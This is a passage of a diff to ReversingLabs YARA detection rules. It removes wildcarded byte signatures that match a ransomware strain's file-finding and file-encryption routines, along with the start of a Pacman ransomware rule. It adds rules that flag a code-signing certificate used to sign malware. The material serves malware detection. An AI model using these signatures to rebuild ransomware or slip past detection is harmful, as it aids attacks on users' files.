-            ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 CE 01 00 00 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 75 0C 8B 55 ?? 3B 55 ?? 0F 84 73 01 00 00 C7 45 ?? ??
-            ?? ?? ?? 8B 45 ?? 33 C9 8B 55 ?? 2B 55 ?? 8B 75 ?? 1B 75 ?? 89 85 ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 75 ?? 8B 45 ?? 3B 45
-            ?? 77 1A 72 0B 8B 8D ?? ?? ?? ?? 3B 4D ?? 73 0D 8B 55 ?? 33 C0 89 55 ?? 89 45 ?? EB 12 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55
-            ?? 89 4D ?? 89 55 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 33 D2 03 4D ?? 13 55 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 3B 45 ?? 75 12 8B 8D ?? ?? ?? ?? 3B 4D ?? 75 07 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B
-        }
-		$v20_1_encrypt_file_3 = {
-            55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F 84 A2 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 96 00 00 00 C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 60 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF
-            D1 85 C0 74 31 8B 55 ?? 3B 55 ?? 75 29 8B 45 ?? 33 C9 03 45 ?? 13 4D ?? 89 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ??
-            52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 02 EB 0D 83 7D ?? ?? 74 02
-            EB 05 E9 79 FE FF FF 83 7D ?? ?? 74 17 8B 55 ?? 3B 55 ?? 75 0F 8B 45 ?? 3B 45 ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ??
-            ?? 8B 90 ?? ?? ?? ?? FF D2 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ??
-            ?? ?? ?? FF D0 83 7D ?? ?? 74 0C 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0
-            83 7D ?? ?? 75 22 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 75 07 C7 45 ?? ?? ?? ?? ??
-            8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 60 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 74 37 8D 95 ?? ?? ?? ?? 52 8D 85
-            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90
-            ?? ?? ?? ?? FF D2 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 5E 8B E5 5D C3
-        }
-		$v30_1_encrypt_file_1 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 02 05 00 00 8B 45 ?? 83 38 ?? 74
-            09 8B 4D ?? 83 79 ?? ?? 75 08 8B 45 ?? E9 E9 04 00 00 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
-            FF D0 89 45 ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 6F 04 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 0F 85 90 03 00 00 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 F8 ?? 0F 84 70 03
-            00 00 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 50 03 00 00 8D 55 ?? 52 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 38 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ??
-            ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 83 7D ?? ?? 0F 84 04 03 00 00 6A ?? 6A ?? 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 E8 ??
-            ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 CC 02 00 00 8B 4D ?? 3B 4D ?? 73 08 8B 55 ?? 89 55 ?? EB 06 8B 45 ?? 89
-            45 ?? 8B 4D ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ??
-            ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F 84 73 01 00 00 8B 45 ?? 8B 48 ?? 83 E9 ?? 89 4D ?? 8B 55 ?? D1 E2 89 55 ?? 8B 45 ??
-        }
-		$v30_1_encrypt_file_2 = {
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 35 01 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 2B 4D ?? 39 4D ?? 73 08 8B 55 ?? 89 55 ?? EB 09 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 4D
-            ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
-            FF D0 85 C0 0F 84 94 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 88 00 00 00 8B 55 ?? 3B 55 ?? 73 07 C7 45 ?? ?? ?? ?? ?? 83 7D ??
-            ?? 74 73 8B 45 ?? 89 45 ?? 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80
-            ?? ?? ?? ?? FF D0 85 C0 74 44 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF
-            D2 85 C0 74 21 8B 45 ?? 3B 45 ?? 75 19 8B 4D ?? 03 4D ?? 89 4D ?? 8B 55 ?? 03 55 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 83 7D
-            ?? ?? 74 06 83 7D ?? ?? 74 02 EB 0C 8B 45 ?? 3B 45 ?? 0F 85 FB FE FF FF 8B 4D ?? 3B 4D ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B
-            55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 83 7D ?? ?? 0F 85 02 01 00 00 C7 45
-            ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 DB 00 00 00 6A ?? 8D
-            4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 AE 00
-        }
-		$v30_1_encrypt_file_3 = {
-            00 00 8B 55 ?? 8B 45 ?? 3B 42 ?? 0F 85 9F 00 00 00 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88
-            ?? ?? ?? ?? FF D1 85 C0 74 7E 83 7D ?? ?? 75 78 8B 55 ?? 3B 55 ?? 74 1B 8B 45 ?? 8B 4D ?? 03 48 ?? 89 4D ?? 8B 55 ?? 2B
-            55 ?? 89 55 ?? 8B 45 ?? 89 45 ?? 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1
-            85 C0 74 34 83 7D ?? ?? 75 2E 6A ?? 8D 55 ?? 52 6A ?? 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85
-            C0 74 0D 83 7D ?? ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 EB 07 C7 45 ?? ?? ??
-            ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 75 71 83 7D ?? ?? 75 28 83 7D ?? ?? 75 22 68 ?? ??
-            ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? EB 43 83 7D ?? ?? 74 36 83 7D ??
-            ?? 74 30 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            74 07 C7 45 ?? ?? ?? ?? ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 45 ?? 8B E5 5D C3
-        }
-		$v30_2_encrypt_file_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 BF 05 00 00 8B 45 ??
-            83 38 ?? 74 1B 8B 4D ?? 83 79 ?? ?? 74 12 8B 55 ?? 83 7A ?? ?? 74 09 8B 45 ?? 83 78 ?? ?? 75 08 8B 45 ?? E9 94 05 00 00
-            8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ??
-            ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 1A 05 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B
-            4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 8D 45 ?? 50
-            8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 0D 04 00 00 66 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 6A ?? 6A ??
-            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 D5 03 00 00
-            8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 BD 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 90 03 00 00 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 52 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 FF 02 00 00
-        }
-		$v30_2_encrypt_file_2 = {
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 8B 48 ?? 51 8B 55 ??
-            8B 02 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 A7 02 00 00 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B
-            4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 67 02 00 00 8B 55 ?? 8B 45 ?? 3B 42 ??
-            0F 85 58 02 00 00 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F
-            84 31 02 00 00 8B 45 ?? 3B 45 ?? 0F 85 25 02 00 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ??
-            ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 F4 01 00 00 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ??
-            ?? ?? 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 75 0C 8B 55 ?? 3B 55 ?? 0F
-            84 90 01 00 00 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 33 C9 8B 55 ?? 2B 55 ?? 8B 75 ?? 1B 75 ?? 89 85 ?? ?? ?? ?? 89 8D ?? ?? ??
-            ?? 89 95 ?? ?? ?? ?? 89 75 ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 77 1D 72 0E 8B 8D ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 73 0D 8B 55 ??
-            33 C0 89 55 ?? 89 45 ?? EB 12 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 ?? 89 4D ?? 89 55 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 33 D2 03
-            4D ?? 13 55 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 75 12 8B 8D ?? ?? ?? ?? 3B 4D ?? 75 07 C7
-            45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F
-            84 B3 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 A7 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B
-        }
-		$v30_2_encrypt_file_3 = {
-            4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 71 6A ?? 8D 45 ?? 50 8B 4D ??
-            51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 42 8B 55 ?? 3B 55 ?? 75 3A 8B 45 ?? 33 C9 03
-            45 ?? 13 4D ?? 89 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 33 C0 03 55 ?? 13 45 ?? 89 55 ?? 89 45 ?? 8B 4D ?? 51 E8
-            ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 02 EB 0D 83 7D ?? ?? 74 02 EB 05
-            E9 5C FE FF FF 83 7D ?? ?? 74 17 8B 4D ?? 3B 4D ?? 75 0F 8B 55 ?? 3B 55 ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B
-            88 ?? ?? ?? ?? FF D1 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ??
-            ?? FF D2 83 7D ?? ?? 74 0C 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 7D
-            ?? ?? 75 22 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 60 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 74 37 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
-            ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ??
-            ?? ?? FF D1 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 45 ?? 5E 8B E5 5D C3
-        }
-		$v30_3_encrypt_file_1 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 75 08 8B 45 ?? E9 48 04 00 00 83 7D ?? ?? 75 08 8B 45 ?? E9 3A 04 00
-            00 8B 45 ?? 83 78 ?? ?? 74 11 8B 4D ?? 83 39 ?? 74 09 8B 55 ?? 83 7A ?? ?? 75 08 8B 45 ?? E9 18 04 00 00 C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 6A ?? 8B 55
-            ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B
-            90 ?? ?? ?? ?? FF D2 89 45 ?? 83 7D ?? ?? 0F 84 90 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84
-            83 00 00 00 8B 45 ?? 8B 48 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 74 6B 6A ?? 8D 55 ?? 52 8B 45 ?? 8B 48 ??
-            51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 39 8B 55 ?? 3B 15 ?? ?? ?? ?? 75 2E 8B 45 ??
-            8B 48 ?? 51 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 50 ?? FF D2 85 C0 75 0E C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 9A 02 00 00 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ??
-            8B 90 ?? ?? ?? ?? FF D2 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 63 02 00 00
-            8B 55 ?? 3B 55 ?? 0F 87 57 02 00 00 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 3F 02 00 00 6A ?? 6A
-        }
-		$v30_3_encrypt_file_2 = {
-            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 0B 02 00
-            00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 81 E1 ?? ?? ?? ?? 74 1C 6A ?? 6A ?? 8B 15 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B
-            88 ?? ?? ?? ?? FF D1 C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
-            FF D0 85 C0 0F 84 52 01 00 00 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 8B 55 ?? 8B 02 50 8B 4D ?? 8B 51 ?? 52 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 0A 01 00 00 8B 55 ?? 8B 42 ?? 83 E8 ?? 89 45 ?? 8B 4D ?? D1 E1
-            89 4D ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 CC 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 76 8B 55 ??
-            3B 55 ?? 73 07 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 5F 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 6A ?? 8B 45 ?? 50 6A ?? 8B 4D
-            ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 21 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ??
-            ?? ?? 8B 88 ?? ?? ?? ?? FF D1 EB 15 83 7D ?? ?? 74 0D 83 7D ?? ?? 74 07 C7 45 ?? ?? ?? ?? ?? EB 0E EB 02 EB 0A 83 7D ??
-            ?? 0F 84 54 FF FF FF 83 7D ?? ?? 74 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ??
-        }
-		$v30_3_encrypt_file_3 = {
-            ?? 8B 88 ?? ?? ?? ?? FF D1 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 75 47 8B 4D ?? 81 E1 ??
-            ?? ?? ?? 74 3C 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ??
-            50 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
-            FF D0 EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 7D ?? ?? 75 20 68 ?? ?? ?? ?? 8B
-            45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0
-            8B 45 ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $v30_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_1_find_file_1 and $v30_1_find_file_2 and $v30_1_encrypt_file_1 and $v30_1_encrypt_file_2 and $v30_1_encrypt_file_3 ) or ( ( $v30_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_2_find_file_1 and $v30_2_find_file_2 and $v30_2_encrypt_file_1 and $v30_2_encrypt_file_2 and $v30_2_encrypt_file_3 ) or ( ( $v20_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_2_find_file_1 and $v30_2_find_file_2 and $v20_1_encrypt_file_1 and $v20_1_encrypt_file_2 and $v20_1_encrypt_file_3 ) or ( ( $v30_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_3_find_file_1 and $v30_3_find_file_2 and $v30_3_encrypt_file_1 and $v30_3_encrypt_file_2 and $v30_3_encrypt_file_3 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VELES LTD." and ( pe.signatures [ i ] . serial == "00:a8:d4:0d:a6:70:86:79:c0:8a:eb:dd:ea:6d:3f:6b:8a" or pe.signatures [ i ] . serial == "a8:d4:0d:a6:70:86:79:c0:8a:eb:dd:ea:6d:3f:6b:8a" ) and 1547424000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Pacman : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_307642E1F3A92C6Cc2E7Fb6E18F2Ddcb : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Pacman ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a440769b-030b-5b72-a6f2-cf478dd7acd2"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "6dd35efb-daea-5668-a01d-f5b80371b04c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Pacman.yara#L1-L68"
